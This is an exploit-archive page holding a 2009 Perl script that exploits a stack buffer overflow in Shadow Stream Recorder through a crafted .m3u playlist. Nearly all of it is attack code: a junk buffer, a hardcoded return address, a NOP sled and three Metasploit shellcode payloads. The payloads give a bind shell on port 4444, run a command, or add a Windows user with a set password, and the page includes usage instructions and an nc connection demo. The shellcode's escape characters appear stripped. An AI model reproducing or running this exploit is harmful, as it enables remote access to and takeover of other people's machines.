Shadow Stream Recorder (.m3u file) Universal Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Shadow Stream Recorder (.m3u file) Universal Stack Overflow Exploit
# Published : 2009-04-14
# Author : AlpHaNiX
# Previous Title : Star Downloader Free <= 1.45 (.dat) Universal SEH Overwrite Exploit
# Next Title : Easy RM to MP3 Converter Universal Stack Overflow Exploit
#!/usr/bin/perl
# Shadow Stream Recorder (.m3u file) Local Universal Stack Overflow Exploit
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia
###########
# program : Shadow Stream Recorder
# download : http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe
# program homepage : http://www.mini-stream.net/shadow-stream-recorder/
##########
# Exploit In Action :
#[!] usage :
#    ./sploit.pl bindshell
#    ./sploit.pl cmdexec
#    ./sploit.pl adduser
##########
# C:>sploit.pl bindshell
#[!] Done
# C:>nc localhost 4444
# Console - Windows Trust 3.0 (Service Pack 3: v5512)
#
#(C) 1985-2008 Microsoft Corp.
# Everything Tested Under Windows XP SP3 FR
# After Creating The File just open the program & drag and drop m3u evil file ! :)



sub help {print "[!] usage :   n    ./sploit.pl bindshell n    ./sploit.pl cmdexec n    ./sploit.pl adduser n " ;exit();}

&help
unless $ARGV[0];


my $sploit = $ARGV[0];
my $junk   = "http://"."A" x 26117;
my $ret    = "x63x46x92x7C";
my $nope   = "x90" x 30;


# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
my $calc_shellcode =
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9".
"x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05".
"xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09".
"x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d".
"xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26".
"x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64".
"xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb".
"xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28".
"xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44".
"x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38".
"xacx2cxc9x40" ;

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $bindshell =
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x69".
"x45x3bx07x83xebxfcxe2xf4x95x2fxd0x4ax81xbcxc4xf8".
"x96x25xb0x6bx4dx61xb0x42x55xcex47x02x11x44xd4x8c".
"x26x5dxb0x58x49x44xd0x4exe2x71xb0x06x87x74xfbx9e".
"xc5xc1xfbx73x6ex84xf1x0ax68x87xd0xf3x52x11x1fx2f".
"x1cxa0xb0x58x4dx44xd0x61xe2x49x70x8cx36x59x3axec".
"x6ax69xb0x8ex05x61x27x66xaax74xe0x63xe2x06x0bx8c".
"x29x49xb0x77x75xe8xb0x47x61x1bx53x89x27x4bxd7x57".
"x96x93x5dx54x0fx2dx08x35x01x32x48x35x36x11xc4xd7".
"x01x8exd6xfbx52x15xc4xd1x36xccxdex61xe8xa8x33x05".
"x3cx2fx39xf8xb9x2dxe2x0ex9cxe8x6cxf8xbfx16x68x54".
"x3ax16x78x54x2ax16xc4xd7x0fx2dx2ax5bx0fx16xb2xe6".
"xfcx2dx9fx1dx19x82x6cxf8xbfx2fx2bx56x3cxbaxebx6f".
"xcdxe8x15xeex3exbaxedx54x3cxbaxebx6fx8cx0cxbdx4e".
"x3exbaxedx57x3dx11x6exf8xb9xd6x53xe0x10x83x42x50".
"x96x93x6exf8xb9x23x51x63x0fx2dx58x6axe0xa0x51x57".
"x30x6cxf7x8ex8ex2fx7fx8ex8bx74xfbxf4xc3xbbx79x2a".
"x97x07x17x94xe4x3fx03xacxc2xeex53x75x97xf6x2dxf8".
"x1cx01xc4xd1x32x12x69x56x38x14x51x06x38x14x6ex56".
"x96x95x53xaaxb0x40xf5x54x96x93x51xf8x96x72xc4xd7".
"xe2x12xc7x84xadx21xc4xd1x3bxbaxebx6fx99xcfx3fx58".
"x3axbaxedxf8xb9x45x3bx07";


# win32_adduser -  PASS=alphanix EXITFUNC=seh USER=nullarea Size=244 Encoder=PexFnstenvSub http://metasploit.com
my $add_user =
"x2bxc9x83xe9xc9xd9xeexd9x74x24xf4x5bx81x73x13xca".
"x75xb1x0ax83xebxfcxe2xf4x36x9dxf5x0axcax75x3ax4f".
"xf6xfexcdx0fxb2x74x5ex81x85x6dx3ax55xeax74x5ax43".
"x41x41x3ax0bx24x44x71x93x66xf1x71x7excdxb4x7bx07".
"xcbxb7x5axfexf1x21x95x0exbfx90x3ax55xeex74x5ax6c".
"x41x79xfax81x95x69xb0xe1x41x69x3ax0bx21xfcxedx2e".
"xcexb6x80xcaxaexfexf1x3ax4fxb5xc9x06x41x35xbdx81".
"xbax69x1cx81xa2x7dx5ax03x41xf5x01x0axcax75x3ax62".
"xf6x2ax80xfcxaax23x38xf2x49xb5xcax5axa2x85x3bx0e".
"x95x1dx29xf4x40x7bxe6xf5x2dx16xdcx6exe4x10xc9x6f".
"xeax5axd2x2axa4x10xc5x2axbfx06xd4x78xeax1bxc4x66".
"xa6x14xc3x6fxabx55xd0x66xbax1dxd0x64xa3x0dx91x25".
"x8bx31xf5x2axecx53x91x64xafx01x91x66xa5x16xd0x66".
"xadx07xdex7fxbax55xf0x6exa7x1cxdfx63xb9x01xc3x6b".
"xbex1axc3x79xeax1bxc4x66xa6x14xc3x6fxabx55x9ex4b".
"x8ex31xb1x0a";

if ($sploit eq 'bindshell')
{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$bindshell;close(file);print "[!] Done n";}

elsif ($sploit eq 'cmdexec')
{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$calc_shellcode;close(file);print "[!] Done n"}

elsif ($sploit eq 'adduser')
{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$add_user;close(file);print "[!] Done n"}

else {&help}

# www.Syue.com [2009-04-14]